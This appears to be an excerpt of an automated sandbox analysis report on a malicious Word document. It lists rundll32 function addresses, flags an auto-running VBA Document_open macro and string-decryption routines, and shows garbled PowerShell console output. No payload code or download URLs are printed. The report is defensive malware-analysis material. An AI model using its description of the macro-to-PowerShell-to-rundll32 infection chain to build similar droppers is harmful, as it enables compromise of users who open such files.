Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CEB54 8_2_001CEB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C2353 8_2_001C2353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C4D48 8_2_001C4D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C177C 8_2_001C177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D2179 8_2_001D2179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C0D7A 8_2_001C0D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C2B70 8_2_001C2B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D1372 8_2_001D1372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DB165 8_2_001DB165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C5D63 8_2_001C5D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D819F 8_2_001D819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C9D95 8_2_001C9D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CF797 8_2_001CF797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CF793 8_2_001CF793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C498C 8_2_001C498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C598B 8_2_001C598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CDB86 8_2_001CDB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C1983 8_2_001C1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C3DB8 8_2_001C3DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CD5B8 8_2_001CD5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D41AB 8_2_001D41AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D1BA5 8_2_001D1BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D7FA7 8_2_001D7FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DC5A1 8_2_001DC5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CD3F5 8_2_001CD3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C27F3 8_2_001C27F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CB3E8 8_2_001CB3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CFBE6 8_2_001CFBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0202303C 8_2_0202303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_020187D0 8_2_020187D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02031E14 8_2_02031E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B4012 9_2_001B4012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AC017 9_2_001AC017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B0604 9_2_001B0604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A9C3D 9_2_001A9C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AC851 9_2_001AC851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BCA55 9_2_001BCA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BBC4D 9_2_001BBC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A9846 9_2_001A9846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A5478 9_2_001A5478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B4478 9_2_001B4478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BCC7F 9_2_001BCC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AE272 9_2_001AE272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B9665 9_2_001B9665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A9A99 9_2_001A9A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AB6B9 9_2_001AB6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B34BF 9_2_001B34BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B90BE 9_2_001B90BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A28AA 9_2_001A28AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A2EAC 9_2_001A2EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A70AD 9_2_001A70AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A92A3 9_2_001A92A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BC4A5 9_2_001BC4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A6CA5 9_2_001A6CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B9EDA 9_2_001B9EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AB8D8 9_2_001AB8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BA6D9 9_2_001BA6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AE8DD 9_2_001AE8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B08CF 9_2_001B08CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B34C3 9_2_001B34C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B38C2 9_2_001B38C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B66FB 9_2_001B66FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B00FE 9_2_001B00FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B14FC 9_2_001B14FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A50F1 9_2_001A50F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A30E8 9_2_001A30E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A68EC 9_2_001A68EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B891E 9_2_001B891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B2515 9_2_001B2515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AB10A 9_2_001AB10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BB706 9_2_001BB706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A4304 9_2_001A4304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BD138 9_2_001BD138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B9333 9_2_001B9333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B7132 9_2_001B7132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B3D29 9_2_001B3D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AEF2E 9_2_001AEF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AF52E 9_2_001AF52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AFF2C 9_2_001AFF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A3523 9_2_001A3523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AA323 9_2_001AA323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BC15B 9_2_001BC15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B6158 9_2_001B6158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A2353 9_2_001A2353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AEB54 9_2_001AEB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A4D48 9_2_001A4D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A0D7A 9_2_001A0D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B2179 9_2_001B2179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A177C 9_2_001A177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B1372 9_2_001B1372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A2B70 9_2_001A2B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A5D63 9_2_001A5D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BB165 9_2_001BB165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B819F 9_2_001B819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AF793 9_2_001AF793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AF797 9_2_001AF797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A9D95 9_2_001A9D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A598B 9_2_001A598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A498C 9_2_001A498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A1983 9_2_001A1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001ADB86 9_2_001ADB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A3DB8 9_2_001A3DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AD5B8 9_2_001AD5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B41AB 9_2_001B41AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BC5A1 9_2_001BC5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B7FA7 9_2_001B7FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B1BA5 9_2_001B1BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A27F3 9_2_001A27F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AD3F5 9_2_001AD3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AB3E8 9_2_001AB3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AFBE6 9_2_001AFBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059C851 10_2_0059C851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005ACA55 10_2_005ACA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005ABC4D 10_2_005ABC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00599846 10_2_00599846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00595478 10_2_00595478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A4478 10_2_005A4478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005ACC7F 10_2_005ACC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059E272 10_2_0059E272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A9665 10_2_005A9665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A4012 10_2_005A4012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059C017 10_2_0059C017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A0604 10_2_005A0604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00599C3D 10_2_00599C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A9EDA 10_2_005A9EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059B8D8 10_2_0059B8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AA6D9 10_2_005AA6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059E8DD 10_2_0059E8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A08CF 10_2_005A08CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A38C2 10_2_005A38C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A34C3 10_2_005A34C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A66FB 10_2_005A66FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A00FE 10_2_005A00FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A14FC 10_2_005A14FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005950F1 10_2_005950F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005930E8 10_2_005930E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005968EC 10_2_005968EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00599A99 10_2_00599A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059B6B9 10_2_0059B6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A90BE 10_2_005A90BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A34BF 10_2_005A34BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005928AA 10_2_005928AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005970AD 10_2_005970AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00592EAC 10_2_00592EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005992A3 10_2_005992A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00596CA5 10_2_00596CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AC4A5 10_2_005AC4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AC15B 10_2_005AC15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A6158 10_2_005A6158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00592353 10_2_00592353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059EB54 10_2_0059EB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00594D48 10_2_00594D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00590D7A 10_2_00590D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A2179 10_2_005A2179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059177C 10_2_0059177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A1372 10_2_005A1372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00592B70 10_2_00592B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00595D63 10_2_00595D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AB165 10_2_005AB165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A891E 10_2_005A891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A2515 10_2_005A2515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059B10A 10_2_0059B10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AB706 10_2_005AB706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00594304 10_2_00594304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AD138 10_2_005AD138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A7132 10_2_005A7132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A9333 10_2_005A9333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A3D29 10_2_005A3D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059FF2C 10_2_0059FF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059EF2E 10_2_0059EF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059F52E 10_2_0059F52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00593523 10_2_00593523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059A323 10_2_0059A323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005927F3 10_2_005927F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059D3F5 10_2_0059D3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059B3E8 10_2_0059B3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059FBE6 10_2_0059FBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A819F 10_2_005A819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059F793 10_2_0059F793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00599D95 10_2_00599D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059F797 10_2_0059F797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059598B 10_2_0059598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059498C 10_2_0059498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00591983 10_2_00591983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059DB86 10_2_0059DB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00593DB8 10_2_00593DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059D5B8 10_2_0059D5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A41AB 10_2_005A41AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AC5A1 10_2_005AC5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A7FA7 10_2_005A7FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A1BA5 10_2_005A1BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00406417 11_2_00406417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0041A0F1 11_2_0041A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00404844 11_2_00404844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040E044 11_2_0040E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00415250 11_2_00415250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00410672 11_2_00410672
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: N00048481397007.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module U765y5vgf_ao0faq, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: N00048481397007.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00428000 appears 45 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0045B890 appears 50 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00439898 appears 50 times
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@38/12@6/5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$0048481397007.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBA0B.tmp Jump to behavior
Source: N00048481397007.doc OLE indicator, Word Document stream: true
Source: N00048481397007.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ........................................ .......................0.!.......!.............#...............................h.......5kU.......!..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........!.....L.................!..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... u...............u.............}..v....H.......0.................q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......q...............u.............}..v............0...............8.q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j......................u.............}..v....H.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j..... u...............u.............}..v............0.................q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............+..j.....Jq...............u.............}..v....hm......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.... n................u.............}..v.....n......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............+..j.....Jq...............u.............}..v....hu......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.... v................u.............}..v.....v......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............+..j.....Jq...............u.............}..v....h}......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.... ~................u.............}..v.....~......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0...............XGq.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j....p.................u.............}..v............0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.5.............}..v............0...............XGq.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j......................u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j......................u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j......................u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j......................u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............+..j.....Jq...............u.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j......................u.............}..v....8.......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............+..j......................u.............}..v..... ......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j..... ................u.............}..v....8!......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............+..j.....Jq...............u.............}..v.....(......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....(................u.............}..v....8)......0................Gq............................. Jump to behavior
